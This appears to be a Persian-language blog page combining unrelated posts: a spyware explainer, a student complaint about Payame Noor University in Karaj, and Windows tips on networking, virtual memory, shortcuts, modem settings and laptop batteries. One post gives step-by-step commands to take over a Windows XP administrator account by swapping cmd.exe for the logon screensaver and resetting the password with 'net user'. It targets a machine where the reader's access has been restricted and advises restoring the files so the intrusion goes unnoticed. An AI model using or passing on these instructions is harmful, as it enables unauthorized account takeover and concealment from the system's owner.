Spyware چیست

Spyware به یک سری از نرم افزارهای مزاحم و دردسرساز گفته می شود که بخشی از کنترل کامپیوتر را بدون رضایت کاربر بدست می گیرد و گاه اطلاعات شما را می دزدند.

Spyware نرم افزاری که فقط اطلاعات شما را بدزدد، نیست بلکه آزار و اذیت هایی هم دارد که در ویروسها و کرمهای قدیمی تر وجود نداشت. مثلاً هنگامی که در حال کار با کامپیوتر خود هستید ناگهان به ناخواسته یک لوگوی تبلیغاتی در برابر شما ظاهر می شود. این نوع خاصی از Spyware هاست که با نام adware شناخته می شوند.

موضوع دیگری که باید در مورد Spyware ها بدانید این است که بعضی افراد کرم ها و ویروسها را برای سرگرمی تولید می کنند ولی Spyware ها معمولاً برای منافع مالی نوشته می شوند. و معمولاً قربانی را با وعده هایی مانند شما مقدار زیادی پول برنده شده اید و غیره به دام می اندازند یا حتی پیغام می دهند که سیستم شما نا ایمن است و همکنون به ویروس آلوده شده است و از شما می خواهد روی یک آیکون کلیک کنید تا مشکل سیستم سما را حل کند ولی مشکل دقیقا از همینجا شروع می شود.

در سالهای اخیر حمله کنندگان کامپیوتری تمرکز خود را از سرگرمی به پول در آوردن با هزینه افراد دیگر قرار داده اند. Spyware ها یکی از قابل توجه ترین تهدیدهای کامپیوتری هستند. بله گفتیم قابل توجه، چون آنها اغلب طوری طراحی شده اند که یا مقابله با آنها و یا پیدا کردن آنها سخت است. Spyware به صورت صفحه بانکی گشوده می شود تا اطلاعات بانکی شما را بدزدد. همانطور که داد و ستد اینترنتی بیشتر می شود سوء استفاده از آنها هم بیشتر می شود.

Spyware چگونه کار می کند؟

دنیای Spyware ها بسیار گسترده است و مکانیزم عملکرد آن هم بسیار گسترده است. در اینجا چند نوع از آنها را که در اینترنت بیشتر مشاهده شده اند، ذکر می کنیم:

ـــ حمله به مرورگرها (هک اینترنت اکسپلورر، کنترل Active X و ...)

ـــ Bot ها و rootkit ها (که به دیگران اجازه می دهند سیستم شما را از راه دور کنترل کنند.)

ـــ Keylogger ها (هر بار که رمز عبوری را وارد می کنید آنرا ذخیره می کنند یا اطلاعات حساس شما را به سرقت می برند.)

ـــ مجموعه نرم افزارهای مزاحم (مزاحمتهای گوناگونی که در حین کار با کامپیوتر برایتان ایجاد می کنند.)

ـــ Adware ها (در مرورگر یا صفحه نمایش شما اجرا می شوند تا تبلیغاتی را به اجبار برایتان نمایش دهند.)

Spyware ها را می توانید بوسیله نرم افزارهای از بین برنده مجانی شناسایی کنید ولی معمولاً برای از بین بردن آن باید پول بپردازید یا به عبارت دیگر آن نرم افزار را خریداری کنید. و جالب است بدانید بیشتر آنتی ویروسها نمی توانند جلوی Spyware ها را بگیرند. علت این است که Spyware ویروس نیست. ویروس یک برنامه یا قسمتی از کداست که بدون اینکه متوجه شوید وارد کامپیوتر شما می شود و بر خلاف خواسته شما عمل می کند. ولی Spyware زمانی وارد کامپیوتر شما می شود که روی اجازه نامه آن با عنوان I Agree کلیک کنید. بنابراین Spyware ها با علم و اجازه شما وارد کامپیوتر شما می شوند و بنابراین یک ویروس نیستند. بنابراین مراقب باشید تا روی هر لینک یا آیکون مشکوکی کلیک نکنید.

اعتراض دانشجویان دانشگاه پیام نور کرج به عدم مدیریت این دانشگاه

دانشگاه پیام نور کرج در سال تحصیلی 1390 در حالی  آغاز به فعالیت کرد که نه تنها ساختمان این دانشگاه آمده بهره برداری نبود بلکه این دانشگاه فاقد امکانات اولیه نظیر تلفن  آب آشامیدنی و فضای مناسب اداری صندلی و غیره بود

دانشگاه فاقد راه ورودی آسفالته بوده و  ورودی این دانشگاه از مسیری خاکی گذر میکند که داری چاله های عمیق و خطر ناکی که در مسیر دانشجویان قرار دارد

حدود بیست هزار دانشجوی این واحد دانشگاهی به دلیل برخی ناهماهنگی‌ها، مجبورند برای رسیدن به محل تحصیل خود، از جاده‌ای خاکی و ناهموار بگذرند تا یادگیری درس را همراه با مشقت تجربه کرده و ارزش تحصیل خود را بهتر بدانند.

ثبت نام ترم جدید و ورودی های جدید الورود با عدم مدیدریت و ناهماهنگی کامل انجام می پذیرد به صورتی که تعداد زیادی از دانشجویان پس از مراجعه به دانشگاه بدورن دریافت پاسخ مناسب و اطلاع رسانی درست بازمیگردند.

این دانشگاه برای ثبت نام دانشجویان فرمها را به یک کیوسک خصوصی داده و داشجویان برای دریافت این فرمها که شامل 2 برگ  a4 میشود باید در وضعی نامناسب و صفهای بدون نظم اقدادم به خرید این برگه ها نمایند .

این در حال است که اکثر این دانشجویان شاغل هستند و اتلاف وقت بسیاری را متحمل میشوند.

همچنین به دلیل عدم اطلاع رسانی مناسب دانشجویان با مراجعه مکرر به این واحد دانشجویی و عدم درسافت پاسخ مناسب متحمل اتلاف وقت وهزینه های بسیاری میگردند.

و در اعتراض دانشجویان کارمندان با برخورد و  پاسخ های نامناسب جواب  گوی دانشجویان میگردد


لازم به ذکر است شروع کلاسها در این داحد دانشگاهی در حال انجام کرفت که هنوز ثبت نام دانشجویان کامل نگردیده بود و بعد از مدتی بسیاری ازین کلاسها با خذف و یا تغییر ساعت و یا استاد روبرو گردیدند


توضیح : تصاویر فوق از آرشیو تابناک و متعلق به تابستان همین واحد دانشگاهی است 

اما با گذست زمان مراحل تکمیل این دانشگاه هنوز تغییر چندانی نکرده است

واین نقایص ما دانشجویان این واحد دانشگاهی را بر ان داشت تا با تنظیم این شکوالیه خواستار اصلاح مدیریت و پاسخگویی مسئولان گردیم
این وبلاگ به نمایندگی عده ای از دانشجویان این دانشگاه مشاهدات خود را ذکر کرده
و خواستار آنیم که مسولان جوابگویی نقایض ذکر شده باشند که به طور حتم این نقایص بیشتر از موارد ذکر شده است باشند
در صورت تمایل به پاسخ مسولان میتواند با ایمیل infoparse@yahoo.com
اقدام نمایند که با احترام به نظر ایشان اقدام به نشر آن خواهیم کرد

مفاهیم پایه برای مدیریت شبکه در ویندوز هفت

  آنچه در این مقاله گفته می شود فقط برای کمک به کسی که شبکه ای را راه اندازی و مدیریت می کند نیست بلکه می تواند به عنوان منبعی برای کسانی که می خواهند در یک مصاحبه استخدامی شرکت کنند استفاده شود.

اخیرا خانمی که از خویشاوندان برای شغلی با عنوان تحلیل گر امنیت (در سیستم های کامپیوتری) در یک مصاحبه شغلی شرکت کرده بود. از او چند سؤال فنی پرسیده شد اما پرسشی که بیشتر از همه او را به زحمت انداخته بود سؤالی درباره شبکه بود (چون او برای شبکه مطالعه کافی نکرده بود) خوب شما هم اگر به دنبال یک شغل کامپیوتری هستید یا اکنون در چنین حرفه ای فعالیت می کنید بد نیست این نکات و مفاهیم را مطالعه کنید.
ادامه مطلب ...

چگونه رمز عبور admin را در ویندوز xp هک کنیم.

اگر با کامپیوتری کار می کند که روی آن ویندوز xp نصب شده است و دسترسی شما بوسیله کاربر اصلی محدود شده است. آنگاه dos prompt را باز کنید سپس این دستورات را وارد نمائید.

این دستور شما را به شاخه اصلی می برد. /cd

این دستور شما را به شاخه system 32 راهنمایی می کند. cd/windows/system 32 فولدر temphack را برای شما ایجاد می کند. mkdir temphack

یک فایل Back up (پشتیبان) از فایل logon.scr ایجاد می کند. copy logon.scr temphack/ logon.scr

یک فایل پشتیبان از cmd.exe ایجاد می کند. copy cmd.exe temphack/ cmd.exe

فایل اصلی logon.scr را پاک می کند. del logon.scr

فایل cmd.exe رابه logon.scr تغییر نام می دهد. rename cmd.exe logon.scr

از commond prompt خارج می شوید. exit

کاری که شما انجام داده اید از این قرار است که یک فایل پشتیبان از برنامه commond و screen saver تهیه کرده سپس کاری کرده اید که زمانیکه ویندوز screen saver را فراخوانی می کند یک پنجره حفاظت نشده dos prompt در برابر شما ظاهر می شود.

به محض ظاهر شدن این پنجره دستور داخل گیومه را وارد کنید.

net user<نام Admin را اینجا قرار دهید>password

مثلاً اگر نام Admin کلمه Ali باشد و شما blah password را می خواهید کافیست تایپ کنید.

”net user Ali blah“

این عمل رمز عبور را به blah تغییر می دهد.

نکته: به خاطر داشته باشید که محتویات temphack را دوباره به شاخه system 32 برگردانید تا نفوذ شما لو نرود.

راه دیگری هم برای این عمل وجود دارد و آن استفاده از دیسکت راه انداز است. که می توانید آن را از مسیر زیر دنلود کنید. این روش مخصوصاً زمانیکه رمز عبور خود را فراموش کرده اید بسیار مفید خواهد بود.

حافظه مجازی سریعتر در ویندوز

حافظه مجازی سریعتر در ویندوز

برای بالا بردن سرعت اعمال مختلفی که در ویندوز انجام می شود می توانید از روش زیر استفاده کنید:

در پارتیشن بندی هارد دیسک خود یک درایو جداگانه که فقط برای فضای مبادله استفاده خواهد شد جدا کنید. این درایو حداقل باید 200 مگا بایت فضا داشته باشد. در مسیر زیر :

Control Panel>System>Performance>Virtural memory

روی "let me specify my own setting" کلیک کرده و آن را روی درایوی که به این منظور جدا کرده اید set کنید. اگر شما آن درایو را به اندازه 200 مگا بایت گرفته اید باید مینیمم مقدار را 150 مگا بایت و ماکزیم مقدار را 200 مگا بایت قرار دهید کامپیوتر خود را restart کنید باید یک بهبود محسوس در سیستم ملاحظه کنید.

مهمترین میانبر ها در ویندوز هفت

مهمترین میانبر ها در ویندوز هفت
ویندوز هفت تعداد زیادی میانبر های صفحه کلید معرفی کرده است که برای کسانیکه که زیاد با کامپیوتر سر و کار دارند و می خواهند سریع تر کار های خود را انجام دهند می تواند بسیار مفید باشد از طرفی تعداد زیاد این میانبر ها هم خود مشکل ساز شده است و پیدا کردن میانبر های مفید کمی سخت شده است. به همین منظور لیستی از مهمترین آنها را در اختیار خوانندگان عزیز یاد بگیر دات کام قرار می دهیم.


ادامه مطلب ...

تنظیمات فوق العاده برای بهینه سازی مودم در ویندوز 98

تنظیمات فوق العاده برای بهینه سازی مودم در ویندوز 98:

تنظیمات زیر را برای بهینه سازی مودمتان در ویندوز 98 انجام دهید:
روی آیکون Modems در Control Panel دابل کلیک کنید، روی باتون properties کلیک کنید روی جدول (تب) Connection کلیک کنید و سپس روی باتون Port Setting کلیک کنید. روی گزینه Use FIFO buffers علامت تیک بگذارید و باتون را به منتها الیه سمت راست بکشید (High 14 ).
روی آیکون modems در کنترل پانل دابل کلیک کنید در باتون properties و ار منوی Maximum speed سرعت انتقال 115200 را انتخاب کنید روی جدول Connection کلیک کنید و سپس گزینه های Use error control و required to connect را بدون علامت کنید و بلاخره برای ذخیره تنظیمات روی ok کلیک کنید.
اگر مودم شما به یک لامپ فلورسنت نزدیک است ممکن است سبب تداخل در ارسال یا دریافت اطلاعات در مودم شما شود بنابراین اگر یک لامپ فلورسنت روی میز خود دارید بهتر است آن را از مودم دور نگه دارید.

استفاده ی طولانی تر از باطری لپ تاپ


آیا باطری لپ تاپ شما بطور پبوسته نیاز به شارژ دارد؟ با رعایت 7 پیشنهاد زیر در هنگام اجرای ویندوز XP می توانید استفاده ی طولانی تری از باطری لپ تاپ خود بکنید:

1- ابتدا بایستی مطمئن شوید که باطری لپ تاپ شما بطور کامل شارژ نگه می دارد. برای این منظور ابتدا لپ تاپ خود را خاموش کنید سپس باطری را چندین ساعت شارژ کنید. سپس کابل شارژ را از لپ تاپ خود جدا کنید و یک لپ تاپ را روشن کنید. آنگاه با کمک دفترچه راهنمای سازنده ظرفیت باتری خود را آزمایش کنید.

2- اگر با شبکه در ارتباط هستید، هر وقت که لازم شدOffline شوید. ارتباطات شبکه ای می تواند از باطری شما توان زیادی بکشد.

3- وسایلی مانند فلش را که به USB متصل می شوند، هنگامی که استفاده نمی شوند، از USB جدا کنید؛ چرا که این وسایل می توانند برق بسیار زیادی مصرف کنند. حتی بعضی از این دستگاه ها برای شارژ خود از USB استفاده می کنند. و باتری خود را از طریق باتری لپ تاپ شما شارژ می کنند.

4- برنامه هایی وجود دارند که در پس زمینه ی کار شما اجرا می شوند، این برنامه ها هنگام راه اندازی سیستم عامل شما به صورت اتوماتیک راه اندازی و فعال می شوند. مانند ساعت یا دیسک دیفراگمنتر یا حتی یک دیکشنری آنهایی را که لازم ندارید غیر فعال سازید. اما برنامه هایی مانند فایروال یا آنتی ویروس را هرگز غیر فعال نکنید، زیرا ممکن است منجر به خطرات امنیتی شود!

5- اسکرین سیور خود را عوض کرده و اسکرین سیور بدون عکس (Blank Screen) بگذارید. وقتی کامپیوتر شما کار خاصی انجام نمی دهد، نیازی نیست شارژ باطری را با نمایش تصاویر آتش بازی یا متون بسیار بزرگ هدر دهید.

6- اگرچه نباید برنامه ی آنتی ویروس خود را غیر فعال کنید، اما تا وقتی لپ تاپ را به برق متصل نکرده اید، سیستم خود را اسکن کامل نکنید. برای اسکن جاسوس افزارها (Spyware) نیز به همین ترتیب.

7- مهمتر از همه، هنگامی که از کامپیوتر خود استفاده نمی کنید، آنرا خاموش (Shotdown)، آماده باش (Stanby) یا hibernate کنید.

** نکته: توجه داشته باشید که نحوه برخورد با باتری در هنگام شارژ باید به نوع آن و دفترچه راهنما توجه کافی داشته باشید. مثلاً باتری هایی وجود دارند که اگر خیلی دشارژ شوند فاسد می شوند و دیگر قابل استفاده نیستند.